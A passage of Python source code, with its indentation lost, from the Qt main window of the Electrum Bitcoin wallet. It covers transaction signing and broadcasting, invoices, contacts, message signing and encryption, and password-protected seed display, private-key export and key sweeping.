msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
status, msg = False, repr(e)
else:
status, msg = True, tx.txid()
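# If this payment settles a BIP70 payment request, mark the invoice as paid and
# send the payment message to the merchant to obtain a payment ACK.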
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
parent.show_error(display_msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
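# Parse the BIP21 URI. parse_URI invokes self.on_pr once any BIP70 payment
# request referenced by the URI (the 'r' parameter) has been fetched.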
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2]) + ' ' + self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
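# Expose every public Commands method in the console namespace, wrapped so it
# goes through _run and can prompt for the wallet password when required.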
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
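# Derive the keys on a background thread (decryption can take a while) and
# report progress to the GUI via Qt signals; closing the dialog early sets
# 'cancelled' so the worker stops.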
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
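# The Sweep button stays disabled until both a valid destination address and at
# least one parseable private key have been entered.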
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
